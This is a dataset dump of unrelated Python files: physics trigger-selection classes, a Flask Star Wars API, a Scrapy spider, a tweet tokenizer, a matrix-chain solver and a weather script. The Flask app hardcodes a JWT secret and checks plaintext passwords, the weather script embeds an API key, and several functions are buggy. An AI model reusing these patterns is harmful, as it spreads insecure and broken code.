+{"seq_id":"589752549","text":"from Hlt2Lines.Utilities.Hlt2Combiner import Hlt2Combiner\nfrom Hlt2Lines.Utilities.Hlt2Filter import Hlt2ParticleFilter\nfrom HltTracking.HltPVs import PV3D\nfrom Inputs import UnbiasedPhi2KK, Hlt2Muons \n\nclass DisplPhiPhi(Hlt2Combiner):\n def __init__(self, name):\n\n inputs = [UnbiasedPhi2KK]\n\n dc = {}\n dc['phi(1020)'] = (\"(PT > %(PhiPT)s) \" \n \"& (MINTREE('K+'==ABSID,PT) > %(KPT)s) \" \n \"& (MINTREE('K+'==ABSID,BPVIPCHI2()) > %(KIPChi2)s) \" \n \"& (MAXTREE('K+'==ABSID,TRGHOSTPROB) < %(GhostProb)s) \" \n \"& (MINTREE('K+'==ABSID,PROBNNK) > %(KProbNNk)s) \" \n \"& (VFASPF(VCHI2PDOF) < %(VChi2)s) \" \n \"& (in_range( PDGM('phi(1020)') - %(PhiMassWindow)s , M , PDGM('phi(1020)') + %(PhiMassWindow)s ) )\") \n\n mc = (\"(HASVERTEX)\"\n \"& (VFASPF(VCHI2) < %(VChi2)s) \"\n \"& (BPVVDCHI2 > %(FDChi2)s)\") \n\n Hlt2Combiner.__init__(self, name, \"B0 -> phi(1020) phi(1020)\", inputs,\n dependencies = [PV3D('Hlt2')],\n tistos = 'TisTosSpec',\n DaughtersCuts = dc,\n #CombinationCut = cc,\n MotherCut = mc,\n Preambulo = [])\n \n\nclass SharedDiMuonNoIP(Hlt2Combiner) :\n def __init__(self, name):\n\n inputs = [Hlt2Muons]\n \n dc = {}\n dc['mu+'] = (\"(PT > %(MuPT)s) \" \n \"& (P > %(MuP)s) \" \n \"& (TRGHOSTPROB < %(GhostProb)s) \" \n \"& (PROBNNmu > %(MuProbNNmu)s) \") \n cc = \"(AMAXDOCA('') < %(DOCA)s)\" \n mc = \"(VFASPF(VCHI2PDOF) < %(VChi2)s) \" \n\n Hlt2Combiner.__init__(self, name, \"KS0 -> mu+ mu-\", inputs,\n dependencies = [PV3D('Hlt2')],\n DaughtersCuts = dc,\n CombinationCut = cc,\n MotherCut = mc,\n Preambulo = [],\n shared = True)\n\n \nclass QuadMuonNoIP(Hlt2Combiner):\n def __init__(self, name, inputs):\n\n cc = \"APT > %(PT)s\"\n mc = (\"(HASVERTEX)\" \n \"& (VFASPF(VCHI2) < %(VChi2)s) \") \n Hlt2Combiner.__init__(self, name, \"B0 -> KS0 KS0\", inputs,\n dependencies = [PV3D('Hlt2')],\n #DaughtersCuts = dc,\n CombinationCut = cc,\n MotherCut = mc,\n Preambulo = [])\n\n\nclass DisplDiMuon(Hlt2ParticleFilter):\n def __init__(self, name, inputs):\n\n code = (\"(MINTREE('mu+'==ABSID,BPVIPCHI2()) > %(MuIPChi2)s)\"\n \"& (MINTREE('mu+'==ABSID,PROBNNmu) > %(MuProbNNmu)s)\" \n \"& (PT > %(PT)s)\" \n \"& (HASVERTEX)\" \n \"& (BPVIPCHI2() < %(IPChi2)s)\" \n \"& (BPVVDCHI2 > %(FDChi2)s)\") \n Hlt2ParticleFilter.__init__(self, name, code, inputs, dependencies = [PV3D('Hlt2')])\n\n\nclass DisplDiMuonNoPoint(Hlt2ParticleFilter):\n def __init__(self, name, inputs):\n\n code = (\"(MINTREE('mu+'==ABSID,BPVIPCHI2()) > %(MuIPChi2)s)\" \n \"& (MINTREE('mu+'==ABSID,PROBNNmu) > %(MuProbNNmu)s)\" \n \"& (PT > %(PT)s)\" \n \"& (HASVERTEX)\" \n \"& (BPVVDCHI2 > %(FDChi2)s)\") \n Hlt2ParticleFilter.__init__(self, name, code, inputs, dependencies = [PV3D('Hlt2')])\n\n\n\nclass PrmptDiMuon(Hlt2ParticleFilter):\n def __init__(self, name, inputs, highmass = False):\n\n code = ''\n if highmass: code = '(M > %(M)s) &'\n code += (\"(MINTREE('mu+'==ABSID,PT) > %(MuPT)s) & (MINTREE('mu+'==ABSID,P) > %(MuP)s)\" \n \"& (MINTREE('mu+'==ABSID,BPVIPCHI2()) < %(MuIPChi2)s)\" \n \"& (MINTREE('mu+'==ABSID,PROBNNmu) > %(MuProbNNmu)s)\" \n \"& (PT > %(PT)s)\" \n \"& (HASVERTEX)\" \n \"& (BPVVDCHI2 < %(FDChi2)s)\") \n Hlt2ParticleFilter.__init__(self, name, code, inputs, dependencies = [PV3D('Hlt2')])\n\n\nclass PrmptDiMuonSS(Hlt2Combiner) :\n def __init__(self, name):\n\n inputs = [Hlt2Muons]\n \n dc = {}\n dc['mu+'] = (\"(PT > %(MuPT)s) \" \n \"& (P > %(MuP)s) \" \n \"& (BPVIPCHI2() < %(MuIPChi2)s) \" \n \"& (TRGHOSTPROB < %(GhostProb)s) \" \n \"& (PROBNNmu > %(MuProbNNmu)s) \") \n cc = \"(APT > %(PT)s) & (AMAXDOCA('') < %(DOCA)s)\" \n mc = (\"(VFASPF(VCHI2PDOF) < %(VChi2)s) \" \n \"& (PT > %(PT)s)\" \n \"& (HASVERTEX)\" \n \"& (BPVVDCHI2 < %(FDChi2)s)\")\n\n Hlt2Combiner.__init__(self, name, \"[KS0 -> mu+ mu+]cc\", inputs,\n dependencies = [PV3D('Hlt2')],\n DaughtersCuts = dc,\n CombinationCut = cc,\n MotherCut = mc,\n Preambulo = [])\n","sub_path":"Hlt/Hlt/Hlt2Lines/python/Hlt2Lines/Exotica/Stages.py","file_name":"Stages.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312412976","text":"\"\"\"\nThis module takes care of starting the API Server, Loading the DB and Adding the endpoints\n\"\"\"\nimport os\nfrom flask import Flask, request, jsonify, url_for\nfrom flask_migrate import Migrate\nfrom flask_swagger import swagger\nfrom flask_cors import CORS\nfrom utils import APIException, generate_sitemap\nfrom admin import setup_admin\nfrom models import db, User, People, Planets, Vehicles\n##\nfrom flask_jwt_extended import JWTManager, create_access_token\n##\n\napp = Flask(__name__)\n##\napp.config[\"JWT_SECRET_KEY\"] = \"\\xb1}\\xea\\xf5\\xad\\xbf\\xda2|\\xaaII7|$\\xef\\x84q\\x80\\x11t\\x08p\\xb5\\xf4\\x0f\\x81\\x89\\xfb:\\xb3\\x8c\" # Change this \"super secret\" with something else!\njwt = JWTManager(app)\n##\n\napp.url_map.strict_slashes = False\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DB_CONNECTION_STRING')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\nMIGRATE = Migrate(app, db)\ndb.init_app(app)\nCORS(app)\nsetup_admin(app)\n\n# Handle/serialize errors like a JSON object\n@app.errorhandler(APIException)\ndef handle_invalid_usage(error):\n return jsonify(error.to_dict()), error.status_code\n\n# generate sitemap with all your endpoints\n@app.route('/')\ndef sitemap():\n return generate_sitemap(app)\n\n#Token\n\n@app.route(\"/token\", methods=[\"POST\"])\ndef create_token():\n username = request.json.get(\"username\", None)\n password = request.json.get(\"password\", None)\n # Query your database for username and password\n user = User.query.filter_by(username=username, password=password).first()\n if user is None:\n # the user was not found on the database\n return jsonify({\"msg\": \"Bad username or password\"}), 401\n \n # create a new token with the user id inside\n access_token = create_access_token(identity=user.id)\n return jsonify({ \"token\": access_token, \"user_id\": user.id })\n\n#Users\n\n@app.route('/user', methods=['GET'])\ndef getAllUsers():\n all_users = User.query.all()\n all_users = list(map(lambda x: x.serialize(), all_users))\n \n return jsonify(all_users), 200\n\n@app.route('/user', methods=['POST'])\ndef addUser():\n username = request.json['username']\n existingUser = User.query.filter_by(username=username)\n if existingUser == None:\n return \"Creation error!! User already exists\", 400\n else:\n password = request.json['password']\n is_active = False \n new_user = User(username, password, is_active)\n db.session.add(new_user) \n db.session.commit()\n\n return jsonify(new_user.serialize()), 200\n\n#People\n\n@app.route('/people', methods=['POST'])\ndef addPerson():\n\n name = request.json['name']\n birth_year = request.json['birth_year']\n eye_color = request.json['eye_color']\n gender = request.json['gender']\n hair_color = request.json['hair_color']\n height = request.json['height']\n mass = request.json['mass']\n skin_color = request.json['skin_color']\n homeworld = request.json['homeworld']\n item_type = \"people\"\n\n new_person = People(name, birth_year, eye_color, gender, hair_color, height, mass, skin_color, homeworld, item_type)\n db.session.add(new_person)\n db.session.commit()\n \n return jsonify(new_person.serialize()), 200\n\n@app.route('/people', methods=['GET'])\ndef getAllPeople():\n all_people = People.query.all()\n all_people = list(map(lambda x: x.serialize(), all_people))\n \n return jsonify(all_people), 200\n\n@app.route('/people/')\ndef getPersonByName(aName):\n person = People.query.filter_by(name=aName)\n person = list(map(lambda x: x.serialize(), person))\n return jsonify(person), 200\n\n@app.route('/people/')\ndef getPersonById(id):\n person = People.query.filter_by(id=id)\n person = list(map(lambda x: x.serialize(), person))\n return jsonify(person), 200 \n\n@app.route('/people/', methods=['PUT'])\ndef updatePersonById(id):\n person = People.query.filter_by(id=id).first()\n \n name = request.json['name']\n birth_year = request.json['birth_year']\n eye_color = request.json['eye_color']\n gender = request.json['gender']\n hair_color = request.json['hair_color']\n height = request.json['height']\n mass = request.json['mass']\n skin_color = request.json['skin_color']\n homeworld = request.json['homeworld']\n\n person.name = name\n person.birth_year = birth_year\n person.eye_color = eye_color\n person.gender = gender\n person.hair_color = hair_color\n person.height = height\n person.mass = mass\n person.skin_color = skin_color\n person.homeworld = homeworld\n \n db.session.commit()\n return jsonify(person), 200 \n\n@app.route('/people/', methods=['DELETE'])\ndef deletePersonById(id):\n person = People.query.filter_by(id=id).first()\n db.session.delete(person)\n db.session.commit()\n return \"Person deleted successfully!\", 200\n\n#Planets\n\n@app.route('/planets', methods=['POST'])\ndef addPlanet():\n\n name = request.json['name']\n diameter = request.json['diameter']\n rotation_period = request.json['rotation_period']\n orbital_period = request.json['orbital_period']\n gravity = request.json['gravity']\n population = request.json['population']\n climate = request.json['climate']\n terrain = request.json['terrain']\n surface_water = request.json['surface_water']\n item_type = \"planet\"\n\n new_planet = Planets(name, diameter, rotation_period, orbital_period, gravity, population, climate, terrain, surface_water, item_type)\n db.session.add(new_planet)\n db.session.commit()\n \n return jsonify(new_planet.serialize()), 200\n\n@app.route('/planets', methods=['GET'])\ndef getAllPlanets():\n all_planets = Planets.query.all()\n all_planets = list(map(lambda x: x.serialize(), all_planets))\n return jsonify(all_planets), 200\n\n@app.route('/planets/')\ndef getPlanetsByName(aName):\n planet = Planets.query.filter_by(name=aName)\n planet = list(map(lambda x: x.serialize(), planet))\n return jsonify(planet), 200\n\n@app.route('/planets/')\ndef getPlanetById(id):\n planet = Planets.query.filter_by(id=id)\n planet = list(map(lambda x: x.serialize(), planet))\n return jsonify(planet), 200\n\n@app.route('/planet/')\ndef updatePlanet(id):\n planet = Planets.query.filter_by(id=id)\n name = request.json['name']\n diameter = request.json['diameter']\n rotation_period = request.json['rotation_period']\n orbital_period = request.json['orbital_period']\n gravity = request.json['population']\n climate = request.json['climate']\n terrain = request.json['terrain']\n surface_water = request.json['surface_water']\n \n db.session.commit()\n \n return jsonify(planet.serialize()), 200\n\n@app.route('/planets/', methods=['DELETE'])\ndef deletePlanetById(id):\n planet = Planets.query.filter_by(id=id).first()\n db.session.delete(planet)\n db.session.commit()\n return \"Planet deleted successfully!\", 200\n\n#Vehicles\n\n@app.route('/vehicles', methods=['POST'])\ndef addVehicle():\n name = request.json['name']\n model = request.json['model']\n manufacturer = request.json['manufacturer']\n length = request.json['length']\n cost_in_credits = request.json['cost_in_credits']\n crew = request.json['crew']\n passengers = request.json['passengers']\n max_atmosphering_speed = request.json['max_atmosphering_speed']\n cargo_capacity = request.json['cargo_capacity']\n consumables = request.json['consumables']\n item_type = \"vehicle\"\n\n new_vehicle = Vehicles(name, model, manufacturer, length, cost_in_credits, crew, passengers, max_atmosphering_speed, cargo_capacity, consumables, item_type)\n db.session.add(new_vehicle)\n db.session.commit()\n \n return jsonify(new_vehicle.serialize()), 200\n\n@app.route('/vehicles', methods=['GET'])\ndef getAllVehicles():\n all_vehicles = Vehicles.query.all()\n all_vehicles = list(map(lambda x: x.serialize(), all_vehicles))\n \n return jsonify(all_vehicles), 200\n\n@app.route('/vehicles/')\ndef getVehicleByName(aName):\n all_vehicles = Vehicles.query.filter_by(name=aName)\n all_vehicles = list(map(lambda x: x.serialize(), all_vehicles))\n return jsonify(all_vehicles), 200\n\n@app.route('/vehicles/')\ndef getVehicleById(id):\n all_vehicles = Vehicles.query.filter_by(id=id)\n all_vehicles = list(map(lambda x: x.serialize(), all_vehicles))\n return jsonify(all_vehicles), 200 \n\n@app.route('/vehicles/', methods=['DELETE'])\ndef deleteVehicleById(id):\n vehicle = Vehicles.query.filter_by(id=id).first()\n db.session.delete(vehicle)\n db.session.commit()\n return \"Vehicle deleted successfully!\"\n\n# this only runs if `$ python src/main.py` is executed\nif __name__ == '__main__':\n PORT = int(os.environ.get('PORT', 3000))\n app.run(host='0.0.0.0', port=PORT, debug=False)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393689171","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpider类:\n class scrapy.Spider是最基本的类,所有编写的爬虫必须继承这个类,其定义了如何爬取某个(或某些)网站\n 包括爬取动作(例如:是否跟进链接)以及如何从网页的内容中提取结构化数据(item字段)\n\n主要函数及调用顺序:\n__init__():\n 初始化爬虫名字和start_urls列表\nstart_requests():\n 调用make_requests_from_url()方法,生成Requests对象交给Scrapy下载并返回response\nparse():\n 解析response,并返回Item或Requests(需指定回调函数);Item传给Item pipline持久化\n Requests交由Scrapy下载,并由指定的回调函数处理(默认parse()),一直循环直到处理完所有的数据为止;\n\n主要属性和方法\nname:\n 定义spider名字,比如爬取mywebsite.com,该spider通常会被命名为mywebsite,具有唯一性\nallowed_domains:\n 包含了spider允许爬取的域名(domain)的列表,可选\nstart_urls:\n 初始URL元组/列表,当没有指定特定URL时,spider将从该列表中开始爬取\nstart_requests(self):\n 当spider启动爬取并且未指定start_urls时才会调用该方法,返回一个Request对象\nparse(self, response):\n 默认的Request对象回调函数,用来处理网页返回的response信息,生成Item或者新的Request对象\n\nparse()方法工作机制:\n1、方法结尾是yield而不是return,parse()方法将会被当做一个生成器使用;scrapy会逐一获取parse方法中生成的结果并判断类型\n 如果是request就加入爬取队列,是item类型就使用pipeline处理,其他类型则返回错误信息\n2、scrapy取到新的request并不会立马发送,而是先将其放入队列,然后接着从生成器里获取,直到取尽第一部分的request\n 然后再获取第二部分的item,取到item了,就会放到对应的pipeline处理\n3、parse()方法作为回调函数(callback)赋值给了Request,指定parse()方法来处理这些请求scrapy.Request(url, callback=self.parse)\n4、Request对象经过调度,执行生成 scrapy.http.response()的响应对象,并送回给parse()方法,直到调度器中没有Request(递归)\n 取尽之后,parse()工作结束,引擎再根据队列和pipelines中的内容去执行相应的操作\n5、程序在取得各个页面的items前,会先处理完之前所有的request队列里的请求,然后再提取items\n\"\"\"\n\nimport scrapy\nfrom myspider.items import MyspiderItem\n\n\nclass ItcastSpider(scrapy.Spider):\n \"\"\"\n 爬虫程序:解析scrapy引擎返回的Response,默认由parse()函数解析\n \"\"\"\n\n # 爬虫名称\n name = 'itcast'\n # 爬虫的约束区域\n allowed_domains = ['www.itcast.cn']\n # 起始url列表\n start_urls = ['http://www.itcast.cn/channel/teacher.shtml#ajavaee']\n\n # 解析返回的网页数据(response.body),提取结构化数据(生成item)\n def parse(self, response):\n # 创建item对象保存数据\n item = MyspiderItem()\n\n # print(type(response)) # \n # print(response.headers)\n # print(response.body.decode(\"utf-8\"))\n\n # 教师列表:scrapy自带xpath功能\n teachers = response.xpath(\"//div[@class='li_txt']\")\n # print(type(teacher_list)) # \n print(teachers)\n\n # 存放所有教师信息的集合\n # items = []\n\n # 遍历列表\n for each in teachers:\n # print(type(each)) # \n\n # print(type(item)) # \n\n # extract()方法返回unicode字符串,不加extract()方法返回的还是Selector\n name = each.xpath(\"./h3/text()\")[0].extract()\n title = each.xpath(\"./h4/text()\")[0].extract()\n info = each.xpath(\"./p/text()\")[0].extract()\n\n item[\"name\"] = name\n item[\"title\"] = title\n item[\"info\"] = info\n\n # 添加单个老师信息到集合\n # items.append(item)\n\n # 将获取的数据交给pipeline\n yield item\n\n # 直接返回数据,不经过pipeline\n # return items\n\n\n\n","sub_path":"myspider/spiders/itcast.py","file_name":"itcast.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262344227","text":"import re\nimport sys\nimport NLPlib\n\n# Dictionary mapping HTML codes to ascii (used in replace_with_ascii)\nhtml_to_ascii = {'"': '\"',\n '™': 'trademark',\n '&': '&',\n '⁄': '/',\n ''': \"'\",\n '>': '>',\n '<': '<',\n '–': '-',\n '—': '--',\n '¢': 'cent',\n '£': 'pound',\n '¥': 'yen',\n '§': 'section',\n '©': 'copyright',\n '¬': 'not',\n '®': 'registered trademark',\n '°': 'degree',\n }\n\ndef run_twtt(read_from, write_to):\n\t'''(filename, filename) -> NoneType\n\tGiven name of the tweet file (read_from) and the name of the file to\n\toutput results to (write_to), run all necessary modifications on the\n\ttweets in the tweet file and then write out the results to the\n\toutput file, separated by newlines and an \"|\".'''\n\t\n\tread_file = open(read_from, \"r\")\n\tall_tweets = read_file.readlines() #Each element of list is a tweet\n\tread_file.close()\n\twrite_file = open(write_to, \"w\")\n\t\n\t# Go through all the tweets, filter them and write them out\n\tfor j in range(len(all_tweets)):\n\t\tfiltered_tweet = filter_tweet(all_tweets[j])\n\t\twrite_file.write(filtered_tweet)\n\t\tif j < len(all_tweets)-1: # Don't put \"|\" after last tweet\n\t\t\twrite_file.write('\\n|\\n') # Separate tweets with \"|\"\n\t\n\twrite_file.close()\n\t\ndef filter_tweet(tweet):\n\t'''str -> str\n\tGiven a tweet, return a tweet modified with all HTML code removed,\n\tURLS removed, tags removed, tokens split by spaces, and tagged with\n\tNLPlib.'''\n\t\n\ttweet = delete_html(tweet)\n\ttweet = replace_with_ascii(tweet)\n\ttweet = delete_url(tweet)\n\ttweet = delete_twitter_tags(tweet)\n\ttweet = split_sentences(tweet)\n\ttweet = separate_clitics_and_punctuation(tweet)\t\n\ttweet = tag(tweet)\n\t\n\treturn tweet\n\ndef delete_html(tweet):\n\t''' str -> str\n\tGiven a tweet, return a modified tweet with HTML tags removed.\n\tex: Link to image becomes just\n\t\"Link to image\".'''\n\t\n\t# Look for substring that begins with < and ends in >; remove all \n\t# in between and the arrows themselves.\n\treturn re.sub(r'<[^>]*>', '', tweet)\n\ndef replace_with_ascii(tweet):\n\t''' str -> str\n\tGiven a tweet, return a modified tweet with HTML friendly codes\n\treplaced with their ascii equivalents.\t(ex: & -> &)'''\n\t\n\t# Go through all html codes in global dict html_to_ascii\n\t# and replace them with their ascii equivalent if found in tweet\n\tfor (html_code, ascii) in html_to_ascii.items():\n\t\ttweet = tweet.replace(html_code, ascii)\n\t\t\n\treturn tweet\n\ndef delete_url(tweet):\n\t'''str -> str\n\tGiven a tweet, return a modified tweet with URLs removed.'''\n\t\n\t# Remove substring from tweet if it begins with www/html(etc..)\n\t# and ends in a space or end of string; remove shortened links too.\n\treturn re.sub(r'(www|www2|www3|http|https|\\w+\\.\\w+\\/\\w+).*?($| )', '', tweet, \n\t flags=re.IGNORECASE)\n\ndef delete_twitter_tags(tweet):\n\t''' str -> str\n\tGiven a tweet, return a modified tweet with the first character of\n\tusernames (ex: @michael -> michael) and hashtags (ex: #2015 -> 2015)\n\tremoved.'''\n\t\n\t# Find all substrings in tweet that begin w/ @/# and have chars after\n\tlist_of_tags = re.findall(r'(?:@|#)\\w+', tweet)\n\t\n\t# Replace the found substrings with the tags removed.\t\n\tfor tag in list_of_tags:\n\t\ttweet = tweet.replace(tag, tag[1:])\n\t\t\n\treturn tweet\n\t\ndef split_sentences(tweet):\n\t''' str -> str\n\tGiven a tweet, return a modified tweet which has sentences\n\tput onto new lines. Sentences are not split up on the basis of \n\tconsecutive punctuation, decimal numbers and quotations.'''\n\t\n\tlist_of_words = tweet.split()\n\tformatted_tweet = '' # Resulting tweet after formatting is done\n\t\n\tfor word in list_of_words:\n\t\t# Don't put newline after an abbreviation\n\t\tif word in list_of_abbrev: \n\t\t\tformatted_tweet += word + ' '\n\t\telse: # Not an abbreviation\n\t\t\ttemp_word = word # Amend temp_word with newlines\n\t\t\tfor punc in ('.', '!', '?'):\n\t\t\t\tpunc_index = temp_word.rfind(punc)\n\t\t\t\tif (punc_index < 0): # No punctuation found\n\t\t\t\t\tpass\n\t\t\t\telif punc_index == len(temp_word)-1: # Punc is last char in word\n\t\t\t\t\t# Ensure char before it is not a punctuation\n\t\t\t\t\tif (len(temp_word) > 1 and temp_word[-2] not in ('!', '?', '.', '\\n', '\"', \"'\")):\n\t\t\t\t\t\ttemp_word = temp_word[:-1] + \" \" + temp_word[-1] + \"\\n\"\n\t\t\t\telse: # Punc is in middle of word\n\t\t\t\t\t# Don't add \"\\n\" for \"?!?!\", decimal nums or quotes\n\t\t\t\t\tif (temp_word[punc_index+1] in ('!', '?', '.', '\\n', '\"', \"'\")) or\t\\\n\t\t\t\t\t (punc_index >0 and punc == '.' and temp_word[punc_index-1].isdigit() and temp_word[punc_index+1].isdigit()):\n\t\t\t\t\t\tpass\n\t\t\t\t\telse: # Punc is in middle of word but not abbreviation\n\t\t\t\t\t\tpass\n\t\t\t\t\t\t#temp_word = temp_word[:punc_index+1] + \"\\n\" + temp_word[punc_index+1:]\n\t\t\t# Don't put newspace after newline character\n\t\t\tif temp_word and temp_word[-1] != \"\\n\":\t\t\t\n\t\t\t\tformatted_tweet += temp_word + ' '\n\t\t\telse:\n\t\t\t\tformatted_tweet += temp_word\n\treturn formatted_tweet.strip()\n\ndef separate_clitics_and_punctuation(tweet):\n\t'''str -> str\n\tGiven a tweet, return a modified tweet with each token separated by\n\tspaces. This function specifically handles the cases of clitics and\n\tpunctuations, as words had already been separated in split_sentences.\n\t'''\n\t\n\t# Regular expression matching a word followed by any combo of punc.\n\treg_exp = r\"(\\w+)((?:\\;+|\\:+|\\!+|\\?+|[^\\.\\w+]\\.+(?: |$)|\\,+)+)\"\n\t# Loop while tweet has unspaced punctuations\n\twhile re.findall(reg_exp, tweet):\n\t\t# group 1 is word; group 2 is the punctuation \n\t\tclitics = re.search(reg_exp, tweet)\n\t\tsplitted_by_space = clitics.group(1) + ' ' + clitics.group(2)\n\t\t# Only replace first occurrence\n\t\ttweet = re.sub(reg_exp, splitted_by_space, tweet, 1)\n\t\t\n\t# Space parentheses & double quotes\n\ttweet = tweet.replace(\"(\", \" ( \")\n\ttweet = tweet.replace(\")\", \" ) \")\n\ttweet = tweet.replace('\"', ' \" ')\n\n\t# Split on clitics and join again but with space before clitics\n\tclitics_separated_list = re.split(\"\\'\", tweet)\n\treturn \" '\".join(clitics_separated_list)\n\t\ndef tag(tweet):\n\t'''str -> str\n\tGiven a tweet, return a modified tweet with the tokens tagged with\n\ttheir part-of-speech using NLPlib.'''\n\t\n\tsentences_list = tweet.split(\"\\n\")\n\tresult_tweet = ''\n\t\n\tfor sentence in sentences_list:\n\t\t# Source: tagging code from assignment page\n\t\tsent = sentence.split()\n\t\ttags = tagger.tag(sent)\n\t\t# Retrieve tags and append to token\n\t\tfor j in range(len(tags)):\n\t\t\tsent[j] += '/' + tags[j]\n\t\tresult_tweet += ' '.join(sent) + \"\\n\"\n\treturn result_tweet.rstrip()\n\t\t\n\t\n##################### HELPER FUNCTIONS #########################\t\t\t\ndef create_abbrev_list(list_of_filenames):\n\t''' list of filenames -> list of abbreviations\n\tReturn a list of abbreviations given a list of names of files\n\tthat contain them.'''\n\t\n\tlist_of_abbrev = []\n\tfor filename in list_of_filenames:\n\t\tabbrev_file = open(filename, 'r')\n\t\tfor line in abbrev_file:\n\t\t\tlist_of_abbrev.append(line.strip())\n\t\tabbrev_file.close()\n\treturn list_of_abbrev\n\t\t\nif __name__ == \"__main__\":\n\t# Build list of abbreviations\n\tlist_of_abbrev = create_abbrev_list([\"abbrev.english\", \"pn_abbrev.english\"])\n\t# Unpickle dictionary\n\ttagger = NLPlib.NLPlib()\t\n\t# Read from tweet file, make modifications and then write out\n\trun_twtt(sys.argv[1], sys.argv[2])\n","sub_path":"Tweet Classifier/twtt.py","file_name":"twtt.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"654394733","text":"from math import inf\n\np = input(\"Enter matrix dimensions' array separated by space: \").split(\" \")\np = [int(i) for i in p]\nn = len(p) - 1\n\ntable = [[inf for i in range(n + 1)] for i in range(n + 1)]\nfor i in range(n + 1):\n table[i][i] = 0\n\ns = [[-1 for i in range(n + 1)] for i in range(n + 1)]\n\nfor L in range(2, n + 1):\n for i in range(1, n - L + 2):\n j = i + L - 1\n # table[i][j] = inf\n for k in range(i, j):\n q = table[i][k] + table[k + 1][j] + p[i - 1] * p[k] * p[j]\n if q < table[i][j]:\n table[i][j] = q\n s[i][j] = k\n\nprint(\"Total operation: \", table[1][n])\n\n\ndef print_parentheses(s, i, j):\n if i == j:\n print(\"A%d\" % i, end=\"\")\n else:\n print(\"(\", end=\"\")\n print_parentheses(s, i, s[i][j])\n print_parentheses(s, s[i][j] + 1, j)\n print(\")\", end=\"\")\n\n\nprint(\"Multiplication order: \", end=\"\")\nprint_parentheses(s, 1, n)\n","sub_path":"DP_matrix_chain_multiplication.py","file_name":"DP_matrix_chain_multiplication.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360362931","text":"import requests\r\nimport math\r\nimport datetime\r\nfrom states import *\r\n\r\nfilename = 'weatherdata.txt'\r\nwith open(filename, 'a') as file_object:\r\n file_object.write(f\"\\t\\t\\t\\t\\t\\t{'-' * 15}SEARCH HISTORY...{'-' * 15}\\n\")\r\n\r\n\r\ndef info_tech(shadow_location):\r\n \"\"\"user input, file storage\"\"\"\r\n shadow_date_time = datetime.datetime.now().strftime(\"%d %b %Y | %I:%M:%S %p\")\r\n shadow_api_key = '87d845b0b6cf29baa1a73cc34b067a95'\r\n shadow_url = f\"https://api.openweathermap.org/data/2.5/weather?q={shadow_location}&appid={shadow_api_key}\"\r\n shadow_api_link = requests.get(shadow_url)\r\n shadow_data = shadow_api_link.json()\r\n shadow_description = shadow_data['weather'][0]['description']\r\n shadow_temp = shadow_data['main']['temp']\r\n shadow_temp_f = math.floor((shadow_temp * 1.8) - 459.67)\r\n shadow_temp_c = math.floor((shadow_temp_f - 32) * 5 / 9)\r\n shadow_temp_feel = data['main']['feels_like']\r\n shadow_temp_feel = math.floor((shadow_temp_feel * 1.8) - 459.67)\r\n shadow_temp_feel = math.floor((shadow_temp_feel - 32) * 5 / 9)\r\n print(f\"Weather Stats for: {shadow_location} Date-Time: {shadow_date_time}\")\r\n print(f\"Weather: {shadow_description}\\ntemperature: {shadow_temp_f}{chr(176)}F \"\r\n f\"or {shadow_temp_c}{chr(176)}C\\nFeels like: {shadow_temp_feel}{chr(176)}C\\n\")\r\n filename = 'weatherdata.txt'\r\n with open(filename, 'a') as file_object:\r\n file_object.write(f\"Weather Stats for: {shadow_location} Date-Time: {shadow_date_time}\")\r\n file_object.write(f\"Weather: {shadow_description}\\ntemperature: {shadow_temp_f}degreeF \"\r\n f\"or {shadow_temp_c}degreeC\\nFeels like: {shadow_temp_feel}degreeC\\n\\n\\n\")\r\n\r\n\r\ndate_time = datetime.datetime.now().strftime(\"%d %b %Y | %I:%M:%S %p\")\r\nlist_1 = []\r\nlist_2 = ['Weather Stats for', 'Date-Time', 'Weather', 'temperature', 'Feels like']\r\ndict_1 = {}\r\n\r\nfor i in states:\r\n API_key = '87d845b0b6cf29baa1a73cc34b067a95'\r\n url = f\"https://api.openweathermap.org/data/2.5/weather?q={i}&appid={API_key}\"\r\n api_link = requests.get(url)\r\n data = api_link.json()\r\n description = data['weather'][0]['description']\r\n temp = data['main']['temp']\r\n temp_f = math.floor((temp * 1.8) - 459.67)\r\n temp_c = math.floor((temp_f - 32) * 5 / 9)\r\n temp_feel = data['main']['feels_like']\r\n temp_feel = math.floor((temp_feel * 1.8) - 459.67)\r\n temp_feel = math.floor((temp_feel - 32) * 5 / 9)\r\n str_1 = f\"{temp_f}{chr(176)}F or {temp_c}{chr(176)}C\"\r\n str_2 = f\"{temp_feel}{chr(176)}C\"\r\n\r\n list_3 = [i.upper(), date_time, description, str_1, str_2]\r\n dict_3 = {}\r\n for j in range(0, 5):\r\n key_0 = list_2[j] # ['Weather Stats for', 'Date-Time', 'Weather', 'temperature', 'Feels like']\r\n value_0 = list_3[j] # [i.upper(), date_time, description, str_1, str_2]\r\n dict_1[key_0] = value_0\r\n dict_3 = dict_1.copy()\r\n\r\n list_1.append(dict_3)\r\n\"\"\"final printing\"\"\"\r\nfor i in range(0, len(list_1) - 1):\r\n dict_2 = list_1[i]\r\n c = dict_2.keys()\r\n c = list(c)\r\n print(f\"{c[0]}: {dict_2[c[0]]} {c[1]}: {dict_2[c[1]]}\")\r\n print(f\"{c[2]}: {dict_2[c[2]]}\\n{c[3]}: {dict_2[c[3]]}\\n{c[4]}: {dict_2[c[4]]}\\n\")\r\n\r\nfor i in states:\r\n print(i)\r\nwhile True:\r\n resp1 = input(\"search any other state or city: \")\r\n info_tech(resp1)\r\n","sub_path":"requestmodule.py","file_name":"requestmodule.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487577958","text":"import sqlite3, datetime, time\n\nconnection = 